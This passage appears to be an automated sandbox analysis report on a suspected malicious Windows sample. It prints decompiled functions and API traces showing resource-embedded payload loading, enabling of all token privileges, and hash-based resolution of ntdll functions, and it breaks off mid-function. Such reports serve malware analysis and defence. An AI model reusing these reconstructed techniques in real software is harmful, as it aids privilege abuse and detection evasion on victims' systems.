    0x0133b0d0
    0x0133b0d6
    0x0133b0db
    0x0133b17a
    0x0133b17e
    0x0133b183
    0x0133b183
    0x0133b19f
    0x0133b19f
    0x0133b0e1
    0x0133b0e4
    0x0133b0e9
    0x0133b0ed
    0x0133b139
    0x0133b13b
    0x0133b13d
    0x0133b142
    0x0133b159
    0x0133b161
    0x0133b171
    0x0133b171
    0x0133b161
    0x0133b173
    0x0133b174
    0x00000000
    0x0133b179
    0x0133b0ef
    0x0133b0f4
    0x0133b0f6
    0x0133b0f8
    0x0133b0f8
    0x0133b100
    0x0133b11d
    0x0133b127
    0x0133b12c
    0x00000000
    0x00000000
    0x0133b12e
    0x0133b134
    0x0133b134
    0x00000000
    0x0133b134
    0x0133b104
    0x0133b108
    0x0133b10d
    0x0133b111
    0x00000000
    0x00000000
    0x0133b113
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 0133B0D0
      • Part of subcall function 0133883E: RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0133B159
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0133B16B
    • __freea.LIBCMT ref: 0133B174
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 1008AA2F, Relevance: 6.1, APIs: 4, Instructions: 110
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,10087DA6,00000000,00000000,10086575,?,00000000,?,00000001,10087DA6,?,00000001,10086575,00000000), ref: 1008AA7C
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1008AB05
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,10084ED3,?), ref: 1008AB17
    • __freea.LIBCMT ref: 1008AB20
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10082210, Relevance: 6.1, APIs: 4, Instructions: 56
    APIs
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000014,00000010,?,1000140A), ref: 10082228
    • HeapAlloc.KERNEL32(00000008,0000000A), ref: 10082240
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10082258
    • HeapFree.KERNEL32(00000000,00000000), ref: 1008226E
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133458C, Relevance: 6.1, APIs: 4, Instructions: 53timethread
    C-Code - Quality: 100%
    			E0133458C() {
				signed int _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t21;
				signed int _t29;
				signed int _t32;
				signed int _t36;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t21 =  *0x1347004; // 0x262637d3
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = _v8 ^ GetCurrentProcessId();
					QueryPerformanceCounter( &_v24);
					_t29 =  &_v8;
					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
					if(_t36 != 0xbb40e64e) {
						if((0xffff0000 & _t36) == 0) {
							_t29 = (_t36 | 0x00004711) << 0x10;
							_t36 = _t36 | _t29;
						}
					} else {
						_t36 = 0xbb40e64f;
					}
					 *0x1347004 = _t36;
					 *0x1347000 =  !_t36;
					return _t29;
				} else {
					_t32 =  !_t21;
					 *0x1347000 = _t32;
					return _t32;
				}
			}











    0x01334592
    0x01334596
    0x0133459a
    0x013345ad
    0x013345c0
    0x013345cc
    0x013345d5
    0x013345de
    0x013345e5
    0x013345ee
    0x013345f7
    0x013345fb
    0x01334606
    0x0133460f
    0x01334612
    0x01334612
    0x013345fd
    0x013345fd
    0x013345fd
    0x01334614
    0x0133461c
    0x00000000
    0x013345b3
    0x013345b3
    0x013345b5
    0x00000000
    0x013345b5

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 013345C0
    • GetCurrentThreadId.KERNEL32 ref: 013345CF
    • GetCurrentProcessId.KERNEL32 ref: 013345D8
    • QueryPerformanceCounter.KERNEL32(?), ref: 013345E5
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10083182, Relevance: 6.1, APIs: 4, Instructions: 53timethread
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 100831B6
    • GetCurrentThreadId.KERNEL32 ref: 100831C5
    • GetCurrentProcessId.KERNEL32 ref: 100831CE
    • QueryPerformanceCounter.KERNEL32(?), ref: 100831DB
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10011180, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 338
    APIs
    Strings
    • recovered %d pages from %s, xrefs: 10011477
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10088490, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
    APIs
    • _strpbrk.LIBCMT ref: 100884DF
      • Part of subcall function 1008640F: HeapFree.KERNEL32(00000000,00000000), ref: 10086425
      • Part of subcall function 1008640F: GetLastError.KERNEL32(00000000,?,1008A93D,00000000,00000000,00000000,00000000,?,1008A964,00000000,00000007,00000000,?,1008A2E9,00000000,00000000), ref: 10086437
      • Part of subcall function 10086756: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10086758
      • Part of subcall function 10086756: GetCurrentProcess.KERNEL32(C0000417,10089AEE,1009E658,0000002C,100864A7,00000016,10086C36,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 1008677A
      • Part of subcall function 10086756: TerminateProcess.KERNEL32(00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10086781
      • Part of subcall function 10088620: FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 10088765
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10084C7C, Relevance: 5.1, APIs: 4, Instructions: 139
    APIs
    • MultiByteToWideChar.KERNEL32(53128B52,00000009,00000000,00000000,?,00000000,1008215D,00000000,?,?,?,1008215D,00000000,00000000,?,00000000), ref: 10084D12
    • GetLastError.KERNEL32(?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10084D20
    • MultiByteToWideChar.KERNEL32(53128B52,00000001,00000000,00000000,?,00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10084D7B
    • MultiByteToWideChar.KERNEL32(53128B52,00000009,00000000,00000000,00000000,00000000,1008215D,00000000,?,?,?,1008215D,00000000,00000000,?,00000000), ref: 10084DC2
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Analysis Process: ucngw.exe PID: 3280 Parent PID: 3216

    Executed Functions

    Function 00C61EC0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142file

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 124 c61ec0-c61ee7 GetCommandLineW 125 c61eed-c61efe CommandLineToArgvW 124->125 126 c62097-c620ad call c51252 124->126 125->126 127 c61f04-c61f37 call c61850 125->127 127->126 132 c61f3d-c61f61 127->132 133 c61f66-c61f77 132->133 133->133 134 c61f79-c61fa9 call c61be0 133->134 134->126 137 c61faf-c61fc0 call c619c0 134->137 137->126 140 c61fc6-c61fdf call c601b0 137->140 140->126 143 c61fe5-c61ff0 call c61a00 140->143 143->126 146 c61ff6-c62012 call c61a30 call c61d10 143->146 146->126 151 c62018-c62040 CreateFileW 146->151 152 c62042-c62045 151->152 153 c62081-c62094 call c51252 151->153 152->153 155 c62047-c6204c 152->155 157 c62050-c62059 155->157 157->157 158 c6205b-c6207b WriteFile CloseHandle 157->158 158->153
    C-Code - Quality: 71%
    			E00C61EC0() {
				signed int _v8;
				signed int _v16;
				char _v17;
				short _v19;
				struct _OVERLAPPED* _v23;
				char _v48;
				char _v49;
				short _v51;
				struct _OVERLAPPED* _v55;
				char _v64;
				int _v68;
				struct _OVERLAPPED* _v72;
				intOrPtr _v76;
				struct _OVERLAPPED* _v80;
				long _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				short* _t43;
				PWCHAR* _t46;
				void* _t52;
				void* _t55;
				void* _t58;
				void* _t60;
				void _t63;
				void* _t69;
				WCHAR* _t70;
				void* _t71;
				signed int _t76;
				void* _t83;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t99;
				void* _t100;
				signed int _t101;
				signed int _t103;

				_t103 = (_t101 & 0xfffffff8) - 0x4c;
				_t41 =  *0xc6a004; // 0x26d30358
				_v8 = _t41 ^ _t103;
				_push(_t91);
				_v68 = 0;
				_t43 = GetCommandLineW();
				if(_t43 == 0) {
					L16:
					_pop(_t92);
					_pop(_t97);
					_pop(_t69);
					return E00C51252(_t69, _v8 ^ _t103, _t92, _t97);
				} else {
					_t46 = CommandLineToArgvW(_t43,  &_v68);
					if(_v76 < 3) {
						goto L16;
					} else {
						_t70 = _t46[2];
						asm("xorps xmm0, xmm0");
						_v64 = 0;
						asm("movq [esp+0x25], xmm0");
						_v55 = 0;
						_v51 = 0;
						_v49 = 0;
						if(E00C61850(_t46[1],  &_v64) == 0) {
							goto L16;
						} else {
							asm("xorps xmm0, xmm0");
							_v48 = 0;
							asm("movups [esp+0x35], xmm0");
							_t76 = 0;
							_v23 = 0;
							asm("movq [esp+0x45], xmm0");
							_v19 = 0;
							_v17 = 0;
							do {
								 *((char*)(_t103 + _t76 + 0x34)) =  *((intOrPtr*)(_t103 + (_t76 & 0x0000000f) + 0x24));
								_t76 = _t76 + 1;
							} while (_t76 < 0x20);
							_push(_t76);
							_v84 = 0;
							_v80 = 0;
							_v72 = 0;
							_v68 = 0;
							_t52 = E00C61BE0(_t76,  &_v84); // executed
							_t103 = _t103 + 8;
							if(_t52 == 0) {
								goto L16;
							} else {
								_t98 = _v80;
								_t77 = _v80;
								if(E00C619C0(_v80,  &_v72) == 0) {
									goto L16;
								} else {
									_t55 = E00C601B0( &_v84,  &_v72, _t91, _t98, _t98, _t77,  &_v48);
									_t103 = _t103 + 0xc;
									if(_t55 == 0 || E00C61A00( &_v72) == 0) {
										goto L16;
									} else {
										E00C61A30(); // executed
										_v84 = 0;
										_t58 = E00C61D10( &_v84,  &_v72); // executed
										if(_t58 == 0) {
											goto L16;
										} else {
											_t94 =  !=  ? _v84 : L"<NULL>"; // executed
											_t60 = CreateFileW(_t70, 0x40000000, 2, 0, 3, 0, 0); // executed
											_t99 = _t60;
											if(_t99 != 0 && _t99 != 0xffffffff) {
												_t83 = _t94;
												_t90 = _t83 + 2;
												do {
													_t63 =  *_t83;
													_t83 = _t83 + 2;
												} while (_t63 != 0);
												_v84 = 0;
												WriteFile(_t99, _t94, (_t83 - _t90 >> 1) + (_t83 - _t90 >> 1),  &_v84, 0); // executed
												CloseHandle(_t99);
											}
											_pop(_t95);
											_pop(_t100);
											_pop(_t71);
											return E00C51252(_t71, _v16 ^ _t103, _t95, _t100);
										}
									}
								}
							}
						}
					}
				}
			}












































    0x00c61ec6
    0x00c61ec9
    0x00c61ed0
    0x00c61ed6
    0x00c61ed7
    0x00c61edf
    0x00c61ee7
    0x00c62097
    0x00c620a0
    0x00c620a1
    0x00c620a2
    0x00c620ad
    0x00c61eed
    0x00c61ef3
    0x00c61efe
    0x00000000
    0x00c61f04
    0x00c61f0b
    0x00c61f0e
    0x00c61f11
    0x00c61f16
    0x00c61f1c
    0x00c61f24
    0x00c61f2b
    0x00c61f37
    0x00000000
    0x00c61f3d
    0x00c61f3d
    0x00c61f40
    0x00c61f45
    0x00c61f4a
    0x00c61f4c
    0x00c61f54
    0x00c61f5a
    0x00c61f61
    0x00c61f66
    0x00c61f6f
    0x00c61f73
    0x00c61f74
    0x00c61f79
    0x00c61f7e
    0x00c61f87
    0x00c61f8f
    0x00c61f97
    0x00c61f9f
    0x00c61fa4
    0x00c61fa9
    0x00000000
    0x00c61faf
    0x00c61faf
    0x00c61fb7
    0x00c61fc0
    0x00000000
    0x00c61fc6
    0x00c61fd5
    0x00c61fda
    0x00c61fdf
    0x00000000
    0x00c61ff6
    0x00c61ff6
    0x00c61fff
    0x00c6200b
    0x00c62012
    0x00000000
    0x00c62018
    0x00c62033
    0x00c62036
    0x00c6203c
    0x00c62040
    0x00c62047
    0x00c62049
    0x00c62050
    0x00c62050
    0x00c62053
    0x00c62056
    0x00c6205d
    0x00c62074
    0x00c6207b
    0x00c6207b
    0x00c62083
    0x00c62084
    0x00c62085
    0x00c62094
    0x00c62094
    0x00c62012
    0x00c61fdf
    0x00c61fc0
    0x00c61fa9
    0x00c61f37
    0x00c61efe

    APIs
    • GetCommandLineW.KERNEL32 ref: 00C61EDF
    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00C61EF3
      • Part of subcall function 00C61BE0: GetModuleHandleW.KERNEL32(00000000), ref: 00C61C00
      • Part of subcall function 00C61BE0: FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 00C61C1B
      • Part of subcall function 00C61BE0: LoadResource.KERNEL32(00000000,00000000), ref: 00C61C29
      • Part of subcall function 00C61BE0: LockResource.KERNEL32(00000000), ref: 00C61C34
      • Part of subcall function 00C61BE0: SizeofResource.KERNEL32(00000000,00000000), ref: 00C61C43
      • Part of subcall function 00C619C0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00C61C58), ref: 00C619D1
      • Part of subcall function 00C619C0: RtlAllocateHeap.NTDLL(00000000), ref: 00C619D8
      • Part of subcall function 00C61A30: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00C61A5E
      • Part of subcall function 00C61A30: OpenProcessToken.ADVAPI32(00000000), ref: 00C61A65
      • Part of subcall function 00C61A30: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00C61A9F
      • Part of subcall function 00C61A30: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00C61AD7
      • Part of subcall function 00C61A30: LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00C61B21
      • Part of subcall function 00C61A30: AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 00C61B98
      • Part of subcall function 00C61A30: CloseHandle.KERNEL32(FFFFFFFF), ref: 00C61BC4
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00C62036
    • WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 00C62074
    • CloseHandle.KERNEL32(00000000), ref: 00C6207B
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C61A30, Relevance: 10.6, APIs: 7, Instructions: 120

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 159 c61a30-c61a6d GetCurrentProcess OpenProcessToken 160 c61a6f-c61a7f call c51252 159->160 161 c61a80-c61aa3 GetTokenInformation 159->161 163 c61aa9-c61abb call c542cc 161->163 164 c61bb8-c61bc1 161->164 163->164 172 c61ac1-c61adb GetTokenInformation 163->172 166 c61bca-c61bdc call c51252 164->166 167 c61bc3-c61bc4 CloseHandle 164->167 167->166 173 c61baf-c61bb5 call c542c7 172->173 174 c61ae1-c61ae5 172->174 173->164 175 c61aeb-c61aee 174->175 176 c61baa 174->176 178 c61af0-c61b29 call c53610 LookupPrivilegeNameW 175->178 176->173 182 c61b9e-c61ba4 178->182 183 c61b2b-c61b2f 178->183 182->176 182->178 183->182 184 c61b31-c61b98 AdjustTokenPrivileges 183->184 184->182
    C-Code - Quality: 74%
    			E00C61A30() {
				signed int _v8;
				short _v532;
				int _v536;
				struct _TOKEN_PRIVILEGES _v548;
				void* _v552;
				long _v556;
				long _v560;
				long _v568;
				long _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t34;
				int _t40;
				int _t46;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t59;
				void* _t60;
				struct _LUID* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t28 =  *0xc6a004; // 0x26d30358
				_v8 = _t28 ^ _t63;
				_v552 = 0xffffffff;
				_t61 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v552) != 0) {
					_t60 = GetTokenInformation;
					_v556 = 0;
					_t34 = GetTokenInformation(_v552, 3, 0, 0,  &_v556); // executed
					if(_t34 == 0) {
						_push(_v556);
						_t52 = E00C542CC(_t53);
						_t65 = _t64 + 4;
						if(_t52 != 0) {
							_t40 = GetTokenInformation(_v552, 3, _t52, _v556,  &_v556); // executed
							if(_t40 != 0) {
								_t60 = 0;
								if( *_t52 > 0) {
									_t12 = _t52 + 4; // 0x4
									_t62 = _t12;
									do {
										E00C53610(_t60,  &_v532, 0, 0x208);
										_t65 = _t65 + 0xc;
										_v560 = 0x104;
										_t46 = LookupPrivilegeNameW(0, _t62,  &_v532,  &_v560); // executed
										if(_t46 != 0 &&  *((intOrPtr*)(_t62 + 8)) == 0) {
											asm("xorps xmm0, xmm0");
											_v572 = _t62->LowPart;
											asm("movq [ebp-0x234], xmm0");
											_v568 = _t62->HighPart;
											asm("movq [ebp-0x21c], xmm0");
											asm("movq xmm0, [ebp-0x238]");
											_v536 = 0;
											_v548.PrivilegeCount = 1;
											asm("movq [ebp-0x21c], xmm0");
											_v536 = 2;
											AdjustTokenPrivileges(_v552, 0,  &_v548, 0x10, 0, 0);
										}
										_t60 = _t60 + 1;
										_t62 = _t62 + 0xc;
									} while (_t60 <  *_t52);
								}
								_t61 = 1;
							}
							E00C542C7(_t52);
						}
					}
					_t54 = _v552;
					if(_t54 != 0xffffffff) {
						CloseHandle(_t54);
					}
					return E00C51252(_t52, _v8 ^ _t63, _t60, _t61);
				} else {
					return E00C51252(_t52, _v8 ^ _t63, _t59, 0);
				}
			}




























    0x00c61a39
    0x00c61a40
    0x00c61a4c
    0x00c61a5c
    0x00c61a6d
    0x00c61a80
    0x00c61a99
    0x00c61a9f
    0x00c61aa3
    0x00c61aa9
    0x00c61ab4
    0x00c61ab6
    0x00c61abb
    0x00c61ad7
    0x00c61adb
    0x00c61ae1
    0x00c61ae5
    0x00c61aeb
    0x00c61aeb
    0x00c61af0
    0x00c61afe
    0x00c61b03
    0x00c61b06
    0x00c61b21
    0x00c61b29
    0x00c61b33
    0x00c61b38
    0x00c61b43
    0x00c61b4b
    0x00c61b5a
    0x00c61b62
    0x00c61b72
    0x00c61b7c
    0x00c61b86
    0x00c61b8e
    0x00c61b98
    0x00c61b98
    0x00c61b9e
    0x00c61b9f
    0x00c61ba2
    0x00c61af0
    0x00c61baa
    0x00c61baa
    0x00c61bb0
    0x00c61bb5
    0x00c61abb
    0x00c61bb8
    0x00c61bc1
    0x00c61bc4
    0x00c61bc4
    0x00c61bdc
    0x00c61a72
    0x00c61a7f
    0x00c61a7f

    APIs
    • GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00C61A5E
    • OpenProcessToken.ADVAPI32(00000000), ref: 00C61A65
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00C61A9F
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00C61AD7
    • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00C61B21
    • AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 00C61B98
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00C61BC4
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100147C0, Relevance: 6.0, APIs: 4, Instructions: 46native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 317 100147c0-100147d0 318 100147e2-100147e8 317->318 319 100147d2-100147e1 NtQuerySystemInformation 317->319 320 100147f0-100147fd LocalAlloc 318->320 321 10014822-10014828 320->321 322 100147ff-1001480e NtQuerySystemInformation 320->322 323 10014810-10014812 LocalFree 322->323 324 10014818-10014820 322->324 323->324 324->320 324->321
    C-Code - Quality: 100%
    			E100147C0(union _SYSTEMINFOCLASS __ecx, void** __edx) {
				void* _t1;
				void* _t2;
				long _t4;
				void** _t7;
				long _t10;
				long _t12;

				_t7 = __edx;
				_t14 = __ecx;
				_t10 = 0xc0000004;
				_t1 =  *__edx;
				if(_t1 == 0) {
					_t12 = 0x1000;
					while(1) {
						_t2 = LocalAlloc(0x40, _t12);
						 *_t7 = _t2;
						if(_t2 == 0) {
							break;
						}
						_t4 = NtQuerySystemInformation(_t14, _t2, _t12, 0); // executed
						_t10 = _t4;
						if(_t10 < 0) {
							LocalFree( *_t7);
						}
						_t12 = _t12 + _t12;
						if(_t10 == 0xc0000004) {
							continue;
						}
						break;
					}
					return _t10;
				} else {
					return NtQuerySystemInformation(__ecx, _t1, 0, 0);
				}
			}









    0x100147c1
    0x100147c5
    0x100147c7
    0x100147cc
    0x100147d0
    0x100147e3
    0x100147f0
    0x100147f3
    0x100147f9
    0x100147fd
    0x00000000
    0x00000000
    0x10014804
    0x1001480a
    0x1001480e
    0x10014812
    0x10014812
    0x10014818
    0x10014820
    0x00000000
    0x00000000
    0x00000000
    0x10014820
    0x10014828
    0x100147d2
    0x100147e1
    0x100147e1

    APIs
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,00000000), ref: 100147D8
    • LocalAlloc.KERNEL32(00000040,00001000,-00000FFF,?,00000001,C0000225,1001477C,?,00000000,C0000225,?,1001268A,?,00000001), ref: 100147F3
    • NtQuerySystemInformation.NTDLL(00000005,00000000,00001000,00000000), ref: 10014804
    • LocalFree.KERNEL32(00000001,?,00000000,C0000225,?,1001268A,?,00000001), ref: 10014812
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10013CB0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 325 10013cb0-10013cd9 GetModuleHandleW call 10013be0 328 10013dd5-10013dde 325->328 329 10013cdf-10013d13 NtQueryInformationProcess 325->329 329->328 330 10013d19-10013d28 329->330 330->328 331 10013d2e 330->331 332 10013d30-10013d41 call 10004943 331->332 335 10013d47-10013d6b call 10001e90 call 10010340 332->335 336 10013dcb-10013dcf 332->336 341 10013d6d 335->341 342 10013d8c-10013d97 335->342 336->328 336->332 345 10013d70-10013d76 341->345 343 10013dba-10013dc9 call 1000493e 342->343 344 10013d99 342->344 343->336 352 10013ddf-10013de9 343->352 346 10013da0-10013db8 344->346 348 10013d83-10013d8a 345->348 349 10013d78-10013d7b 345->349 346->343 346->346 348->342 348->345 349->348 351 10013d7d-10013d80 349->351 351->348
    C-Code - Quality: 85%
    			E10013CB0(union _PROCESSINFOCLASS __ecx, void* __eflags) {
				void* __edi;
				intOrPtr _t20;
				long _t22;
				signed short* _t29;
				signed int _t32;
				signed char* _t35;
				signed int _t41;
				signed char* _t44;
				intOrPtr* _t45;
				signed int _t46;
				signed int _t47;
				intOrPtr* _t50;
				void* _t51;
				void* _t52;

				 *(_t51 + 0x18) = __ecx;
				_t20 = E10013BE0(GetModuleHandleW(L"ntdll.dll"), 0xa5c44c50);
				 *0x1001f38c = _t20;
				if(_t20 == 0) {
					L16:
					return 0;
				} else {
					 *(_t51 + 0x18) = 0;
					_t39 = _t51 + 0x20;
					 *(_t51 + 0x34) = 0;
					asm("xorps xmm0, xmm0");
					 *(_t51 + 0x20) = 0;
					asm("movups [esp+0x30], xmm0"); // executed
					_t22 = NtQueryInformationProcess(0xffffffff, 0, _t51 + 0x20, 0x18, _t51 + 0x10); // executed
					if(_t22 == 0) {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x1c)) + 0xc)) + 0xc;
						_t45 =  *_t50;
						while(_t45 != _t50) {
							_push( *(_t45 + 0x2e) & 0x0000ffff);
							_t35 = E10004943(_t39);
							_t51 = _t51 + 4;
							if(_t35 == 0) {
								goto L15;
							} else {
								E10001E90(_t45, _t35, 0,  *(_t45 + 0x2e) & 0x0000ffff);
								E10010340(_t35,  *((intOrPtr*)(_t45 + 0x30)),  *(_t45 + 0x2c) & 0x0000ffff);
								_t52 = _t51 + 0x18;
